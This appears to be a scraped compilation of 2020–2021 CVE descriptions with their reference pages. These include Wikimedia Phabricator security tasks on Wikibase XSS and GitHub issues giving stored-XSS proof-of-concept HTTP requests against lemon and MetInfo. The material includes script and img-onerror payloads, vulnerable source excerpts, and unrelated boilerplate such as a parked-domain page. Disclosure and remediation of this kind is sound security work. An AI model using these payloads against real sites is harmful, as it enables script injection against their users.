In MediaWiki through 1.37, the Special:ImportFile URI (aka FileImporter) allows XSS, as demonstrated by the clientUrl parameter.

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2021-45474

In MediaWiki through 1.37, Wikibase item descriptions allow XSS, which is triggered upon a visit to an action=info URL (aka a page-information sidebar).

**

XSS on page information Wikibase central description

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

Create an item with description <img src=x onerror=alert()> or change an existing item and add this description. Add a wiki sitelink or go to an existing wiki sitelink of that item. Click on the "page information" sidebar link, e.g. so you arrive at a page like https://en.wikipedia.org/w/index.php?title=Earth&action=info. View an alert box originating from the "Central description" row.

*   Task Graph
*   Mentions

**Event Timeline**

Comment Actions

As soon as this gets reviewed by someone else, the security team will be more than happy to deploy!

Comment Actions

> Security patch deployed and added to /srv/patches.

Thanks for the deploys. Also tracking this issue at {T292236} and {T276237}.

Comment Actions

@sbassett @Reedy We're not clear about the procedure, but we certainly owe you a heads up that the security patch for this was commited to Wikibase master branch (backporting to 1.35-1.37 either already done or pending). I guess the patch could be removed from /srv/patches/?

Comment Actions

We also intend to make this task public given the fix has landed in public git repository. Please stop us if there are some additional steps required (e.g. related to T292236)

Comment Actions

> @sbassett @Reedy We're not clear about the procedure, but we certainly owe you a heads up that the security patch for this was commited to Wikibase master branch (backporting to 1.35-1.37 either already done or pending). I guess the patch could be removed from /srv/patches/?
> 
> We also intend to make this task public given the fix has landed in public git repository. Please stop us if there are some additional steps required (e.g. related to T292236)

For non-bundled extensions like Wikibase, a task like this can be made public if mitigations have been deployed to Wikimedia production and there is no sensitive information on the task, which I do not believe there is. And yes, it's fine to handle any relevant backports once the issue has been mitigated within Wikimedia production. The backport to master means the patch will be removed from Wikimedia production either today for wmf.11 (if it made the cut) or next week for wmf.12 (or whatever it will be). This issue will get a proper CVE once we get closer to processing the supplemental security release, again towards the end of the December 2021. I believe that's pretty much everything left to do at this point.

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2021-45473: ⚓ T294693 XSS on page information Wikibase central description

In MediaWiki through 1.37, XSS can occur in Wikibase because an external identifier property can have a URL format that includes a $1 formatter substitution marker, and the javascript: URL scheme (among others) can be used.

**

XSS in Wikibase using formatter URL

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

Users can specify a URL format in an external identifier property using a formatter URL with a string like "https://viaf.org/viaf/$1" and then use the external identifier property in an item to substitute a string into the URL. However there seems to be no protocol validation, meaning users can use a string like "javascript:alert() //$1" to execute javascript when the URL is clicked.

Risk Rating

Low

Author Affiliation

Wikimedia Communities

*   Task Graph

**Event Timeline**

Comment Actions

> Someone seems to have noticed this before me as you can see at https://test.wikidata.org/wiki/Property:P95266. So either this is a duplicate task or it just wasn't reported, or it's some sort of regression.

We get a lot of folks who play around/test things out on live wikis. Given the author's history, I doubt this was at all intentionally malicious, though it might not be a terrible idea to delete/os that wikidata item just to be safe, in that it actively points any would-be attacker in the correct direction here.

Also, specifically adding a few WMDE folks here for additional attention.

Comment Actions

I made myself oversighter (let me know if I should !log that, I wasn’t sure) and deleted the property. I hope that doesn’t generate a notification to the user, though even if it does, they hopefully won’t remember what the property was (given that it was created in February 2020; I didn’t put any details in the log message).

Comment Actions

Looks like the only currently used protocols (on Wikidata) are https (4650 times), http (1829), tel (2), and httsp (1, clearly a typo). We allow some more protocols in URL values (e.g. email; UrlSchemeValidators::getValidator() has a fairly long list), but it looks like those aren’t used in formatter URLs at the moment, so let’s limit those to https, http and tel for now. (And by “limit”, I mean that we just don’t use the formatter URL if it uses another property, though we won’t block anyone from saving it.)

TODO: Also look into formatter URI for RDF resource.

Comment Actions

Proposed patch:

I haven’t yet been able to reproduce this issue locally – I think formatter URLs have some weird caching.

Comment Actions

As far as I can tell, the ExternalIdentifierRdfBuilder has the same problem, i.e. we might emit javascript: “URIs” in our RDF output. (I’ve been able to reproduce this locally, too – note that the property must have the datatype external-id.) I’m not sure if that’s considered a security issue? I don’t think we make these URIs clickable anywhere on wikidata.org; on query.wikidata.org, users can build arbitrary URIs anyways (example).

Comment Actions

> Proposed patch:
> 
> I haven’t yet been able to reproduce this issue locally – I think formatter URLs have some weird caching.

I have been able to reproduce it locally now and the patch seems to fix it. (It looks like turning the property into an external-id one was required – I thought we also supported formatter URLs on the string type, but I might’ve been wrong. Try running php extensions/Wikibase/repo/maintenance/changePropertyDataType.php --new-data-type external-id --property-id P\_\_\_, or just make sure your test property ID for this task has datatype external identifier to begin with.)

Comment Actions

> > Someone seems to have noticed this before me as you can see at https://test.wikidata.org/wiki/Property:P95266. So either this is a duplicate task or it just wasn't reported, or it's some sort of regression.
> 
> We get a lot of folks who play around/test things out on live wikis. Given the author's history, I doubt this was at all intentionally malicious, though it might not be a terrible idea to delete/os that wikidata item just to be safe, in that it actively points any would-be attacker in the correct direction here.

The user in question is @Bugreporter on Phabricator, by the way, if anyone wants to check if they created any security tasks which this might be a duplicate of. (I’m not in acl\*security, so I can’t check myself.)

Comment Actions

> Deployed to wmf.9 and .12, and notified @hashar for wmf.13 coordination. Bug no longer occurs on Special:Undelete for that property, where it had previously still been reproducible. (Note: requires oversighter rights to see.)

Thanks, I've updated T276237 and T292236.

> The user in question is @Bugreporter on Phabricator, by the way, if anyone wants to check if they created any security tasks which this might be a duplicate of. (I’m not in acl\*security, so I can’t check myself.)

Subbing them to see if they remember (I view this action as very low-risk in the context of this bug).

sbassett changed the task status from Open to In Progress.Tue, Dec 14, 7:07 PM

sbassett triaged this task as Low priority.

sbassett changed Author Affiliation from N/A to Wikimedia Communities.

sbassett changed Risk Rating from N/A to Low.

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2021-45472: ⚓ T297570 XSS in Wikibase using formatter URL

An XSS vulnerability was found in Privoxy which was fixed in cgi_error_no_template() by encode the template name when Privoxy is configured to servce the user-manual itself.

author

Fabian Keil <fk@fabiankeil.de>

Tue, 2 Nov 2021 11:11:37 +0000 (12:11 +0100)

committer

Fabian Keil <fk@fabiankeil.de>

Tue, 7 Dec 2021 14:06:06 +0000 (15:06 +0100)

commit

0e668e9409cbf4ab8bf2d79be204bd4e81a00d85

tree

1fca9df628a2c3cb35a4e1b6291ec80ee9509072

tree | snapshot

parent

8080c826a824bf98a3a7eff419db2a41600c8437

commit | diff

cgi\_error\_no\_template(): Encode the template name to prevent XSS

OVE-20211102\-0001. CVE-2021-44543.

Reported by: Artem Ivanov

CVE-2021-44543: www.privoxy.org Git - privoxy.git/commit

Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin configurations.

CVE-2021-44526: ServiceDesk Plus readme | Service desk release notes | ServiceDesk Plus latest version read me notes | IT service management release notes | Service desk current version

S-CMS Government Station Building System v5.0 contains a cross-site scripting (XSS) vulnerability in the search function.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-20425: s-cms Government station building system exists XSS · Issue #1 · Str1am/vulnerability

S-CMS Government Station Building System v5.0 contains a cross-site scripting (XSS) vulnerability in /function/booksave.php.

This webpage was generated by the domain owner using Sedo Domain Parking. Disclaimer: Sedo maintains no relationship with third party advertisers. Reference to any specific service or trade mark is not controlled by Sedo nor does it constitute or imply its association, endorsement or recommendation.

CVE-2020-20426: government.com - This website is for sale! - government Resources and Information.

Blog CMS v1.0 contains a cross-site scripting (XSS) vulnerability in the /controller/CommentAdminController.java component.

CVE-2020-20605: Blog CMS V1.0 feedback have a xss vulnerability · Issue #4 · xuzijia/blog

A cross-site scripting (XSS) vulnerability in the potrtalItemName parameter in \web\PortalController.java of lemon V1.10.0 allows attackers to execute arbitrary web scripts or HTML.

您好，我在lemon v1.10.0中编辑组件处发现存在存储型XSS

**有效负荷：**

<script>alert('cookie')</script>

文件名：src\\main\\java\\com\\mossle\\portal\\web\\PortalController.java  
line : 96~151  
代码：

        @RequestMapping("save")
        public String save(@RequestParam(value = "id", required = false) Long id,
                @RequestParam("portalWidgetId") Long portalWidgetId,
                @RequestParam("portalItemName") String portalItemName) {
            String userId = currentUserHolder.getUserId();
            PortalInfo portalInfo = this.copyOrGetPortalInfo(userId);
    
            PortalWidget portalWidget = portalWidgetManager.get(portalWidgetId);
            PortalItem portalItem = null;
    
            if (id == null) {
                portalItem = new PortalItem();
    
                Integer columnIndex = (Integer) portalItemManager
                        .findUnique(
                                "select min(columnIndex) from PortalItem where portalInfo=?",
                                portalInfo);
    
                if (columnIndex == null) {
                    columnIndex = 0;
                }
    
                Long rowIndexLong = (Long) portalItemManager
                        .findUnique(
                                "select count(*) from PortalItem where portalInfo=? and columnIndex=?",
                                portalInfo, columnIndex);
    
                if (rowIndexLong == null) {
                    rowIndexLong = 0L;
                }
    
                int rowIndex = rowIndexLong.intValue();
                portalItem.setColumnIndex(columnIndex);
                portalItem.setRowIndex(rowIndex);
                portalItem.setPortalInfo(portalInfo);
            } else {
                portalItem = this.createOrGetPortalItem(portalInfo, id);
            }
    
            portalItem.setName(portalItemName);
            portalItem.setPortalWidget(portalWidget);
            portalItemManager.save(portalItem);
    
            return "redirect:/portal/index.do";
        }
    
        @RequestMapping("remove")
        public String remove(@RequestParam("id") Long id) {
            String userId = currentUserHolder.getUserId();
            PortalInfo portalInfo = this.copyOrGetPortalInfo(userId);
            PortalItem portalItem = this.createOrGetPortalItem(portalInfo, id);
            portalItemManager.remove(portalItem);
    
            return "redirect:/portal/index.do";
        }
    
    

这里没有对portalItemName字段未进行过滤或者实体化编码导致可执行js代码

**利用：**  
我发现portalItemName没有限制输出，进行构造有效负荷  
**POC**

    POST /portal/save.do HTTP/1.1
    Host: www.mossle.com
    Content-Length: 94
    Cache-Control: max-age=0
    Origin: http://www.mossle.com
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Referer: http://www.mossle.com/portal/index.do
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
    Cookie: SECURITY_LAST_TENANT=default; SECURITY_LAST_USERNAME=lingo; Hm_lvt_3b334d25157f3b6793cb191d399a31c3=1571068073,1571122763; SECURITY_DEVICE_ID=51a0590e-7936-4943-8efd-8f6c1fd966b5; SESSION=5d52a2af-654a-49e3-b49d-0347f684c056
    Connection: close
    
    portalWidgetId=5557079130112&portalItemName=%3Cscript%3Ealert%28%27cookie%27%29%3C%2Fscript%3E
    

**结果：**  
执行了js语句，并弹框

![1571125431620](https://user-images.githubusercontent.com/45255270/66811694-1c2d2700-ef64-11e9-953d-3f0d7b10d884.png)

CVE-2020-20597: lemon 存在存储型XSS · Issue #198 · xuhuisheng/lemon

MetInfo 7.0 beta contains a stored cross-site scripting (XSS) vulnerability in the $name parameter of admin/?n=column&c=index&a=doAddColumn.

Vulnerability Name: Metinfo CMS stored XSS Vulnerability  
Product Homepage: https://www.metinfo.cn/  
Software link: https://www.metinfo.cn/upload/file/MetInfo7.0.0beta.zip  
Version: V7.0.0 beta

Payload:`<script>alert('xss_test')</script>`

file path: MetInfo7.0.0beta\\app\\system\\column\\admin\\index.class.php

line: 118-268

code in line 125

    /**
     * 添加栏目
     */
    public function doAddColumn()
    {
        global $_M;
        $redata     = array();
        $name       = $_M['form']['name'];
        $no_order   = $_M['form']['no_order'];
        $big_class  = $_M['form']['bigclass'];
        $foldername = $_M['form']['foldername'];
        $nav        = $_M['form']['nav'];
        $module     = $_M['form']['module'];
        $out_url    = $_M['form']['out_url'];
        $index_num  = $_M['form']['index_num'];
        $filename   = $_M['form']['filename'];
        $if_in      = $module ? 0 : 1;
    
        $res = self::_addColumn($name, $no_order, $module, $big_class,  $foldername, $nav, $out_url, $index_num, $filename, $if_in);
    
        if ($res === true) {
            //写日志
            logs::addAdminLog('admin_colunmmanage_v6','column_addcolumn_v6','jsok','doAddColumn');
            buffer::clearColumn();
            $redata['status']   = 1;
            $redata['msg']      = $_M['word']['jsok'];
            $this->ajaxReturn($redata);
        }else{
            //写日志
            logs::addAdminLog('admin_colunmmanage_v6','column_addcolumn_v6',$this->error[0],'doAddColumn');
            $redata['msg']      = $this->error[0];
            $redata['status']   = 0;
            $redata['error']    = $this->error;
            $this->ajaxReturn($redata);
        }
    }
    
    /**
     * 添加栏目
     * @param string $name
     * @param string $no_order
     * @param string $module
     * @param string $big_class
     * @param string $foldername
     * @param string $nav
     * @param string $out_url
     * @param string $index_num
     * @param string $index_num
     * @param string $filename
     * @param int $if_in
     * @return bool
     */
    private function _addColumn($name = '', $no_order = '', $module = '', $big_class = '', $foldername = '', $nav = '', $out_url = '', $index_num = '', $filename = '', $if_in = 0)
    {
        global $_M;
    
        $bigclass = $this->database->get_column_by_id($big_class);
        if ($bigclass) {
            $classtype = $bigclass['classtype'] + 1;
            $releclass = $bigclass['module'] == $module ? 0 : $big_class;
        } else {
            $classtype = 1;
            $releclass = 0;
        }
    
        if (!trim($name)) {
            //栏目名为空
            $this->error[] = $_M['word']['column_descript1_v6'];
            return false;
        }
    
        if (preg_match("/[<\x{4e00}-\x{9fa5}>]+/u", $foldername)) {
            //中文目录
            $this->error[] = $_M['word']['column_descript1_v6'];
            return false;
        }
    
        if (!is_simplestr($foldername, '/^[0-9A-Za-z_-]+$/') && $module != 0) {
            //中文目录
            $this->error[] = $_M['word']['column_descript1_v6'];
            return false;
        }
    
        $mod = load::sys_class('handle', 'new')->file_to_mod($foldername);
        if ($mod && $mod != $module) {
            $this->error[] = $_M['word']['columndeffflor'];
            return false;
        }
    
        if ($filename) {
            $filenames = $this->database->get_column_by_filename($filename);
            if ($filenames) {
                $this->error[] = $_M['word']['jsx27'];
                return false;
            }
        }
    
        if ($bigclass['module'] == $module) {
            $sava_data['foldername'] = $bigclass['foldername'];
        } else {
            //验证模块是否可以用
            if (!$if_in) {
                if (!$this->is_foldername_ok($foldername, $module)) {
                    $this->error[] = $_M['word']['column_descript1_v6'];
                    return false;
                }
            }
            $sava_data['foldername'] = $foldername;
        }
    
        $sava_data['name']          = $name;
        $sava_data['filename']      = '';
        $sava_data['bigclass']      = $bigclass['id'];
        $sava_data['samefile']      = 0;
        $sava_data['module']        = $module;
        $sava_data['no_order']      = $no_order;
        $sava_data['wap_ok']        = 0;
        $sava_data['wap_nav_ok']    = 0;
        $sava_data['if_in']         = $if_in;
        $sava_data['nav']           = $nav;
        $sava_data['ctitle']        = '';
        $sava_data['keywords']      = '';
        $sava_data['content']       = '';
        $sava_data['description']   = '';
        $sava_data['list_order']    = 1;
        $sava_data['new_windows']   = 0;
        $sava_data['classtype']     = $classtype;   //可以用bigclass计算得出
        $sava_data['out_url']       = $if_in ?  $out_url :'';
        $sava_data['index_num']     = $index_num;
        $sava_data['indeximg']      = '';
        $sava_data['columnimg']     = '';
        $sava_data['isshow']        = 1;
        $sava_data['lang']          = $_M['lang'];
        $sava_data['namemark']      = '';
        $sava_data['releclass']     = $releclass;   //可以用bigclass计算得出
        $sava_data['display']       = 0;
        $sava_data['icon']          = '';
        $sava_data['foldername']    = $if_in ? '' : $foldername;
        //数据入库
        $id = $this->database->insert($sava_data);
        if ($id) {
            $this->columnCopyconfig($sava_data['foldername'], $sava_data['module'], $id);
            //更改管理员栏目权限
            load::mod_class("admin/admin_op", 'new')->modify_admin_column_accsess($id);
    
            return true;
        }
        $this->error[] = 'Data error';
        return false;
    
    }
    

Can see `$name = $_M['form']['name']` value, did some not filter, and judge some conditions after, and finally write `$sava_data['name'] = $name;` save to the database in

**POC：**

    POST /Metinfo/admin/?n=column&c=index&a=doAddColumn HTTP/1.1
    Host: 192.168.174.136
    Content-Length: 124
    Accept: application/json, text/javascript, */*; q=0.01
    Origin: http://192.168.174.136
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: http://192.168.174.136/Metinfo/admin/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
    Cookie: deviceid=1571022073329; xinhu_ca_rempass=0; xinhu_mo_adminid=ru0tvv0mn0yn0ur0mt0rv0tvt0mm0tvv0mm0yr08; xinhu_ca_adminuser=wangj; Hm_lvt_520556228c0113270c0c772027905838=1571158913; PHPSESSID=40d2af28a4c309bbb824dc957af59b11; arrlanguage=metinfo; re_url=http%3A%2F%2F192.168.174.136%2FMetinfo%2Fadmin%2F; met_auth=7b9a826yxxHlC8hmmlnvj0qBQCdw1d2uVklMDkjbcWPwrcfJ%2B7EYen7QqGPcGExVUw2MvXoZWm95mMQXM1ba40dU8g; met_key=QCv7W3l; admin_lang=cn; page_iframe_url=http%3A%2F%2F192.168.174.136%2FMetinfo%2Findex.php%3Flang%3Dcn%26pageset%3D1; Hm_lpvt_520556228c0113270c0c772027905838=1571213989
    Connection: close
    
    id=on&no_order=32&bigclass=0&classtype=1&name=%3Cscript%3Ealert('xss_test')%3C%2Fscript%3E&nav=3&module=1&foldername=xsstest
    

![1571214303357](https://user-images.githubusercontent.com/45255270/66909609-a26a6b80-f03f-11e9-8a67-b82159aad53c.png)

![1571213869586](https://user-images.githubusercontent.com/45255270/66909596-9c748a80-f03f-11e9-90c9-3515da2dba65.png)

![1571214430269](https://user-images.githubusercontent.com/45255270/66915198-05153480-f04b-11e9-834a-b7d45560ff86.png)

Tag

#xss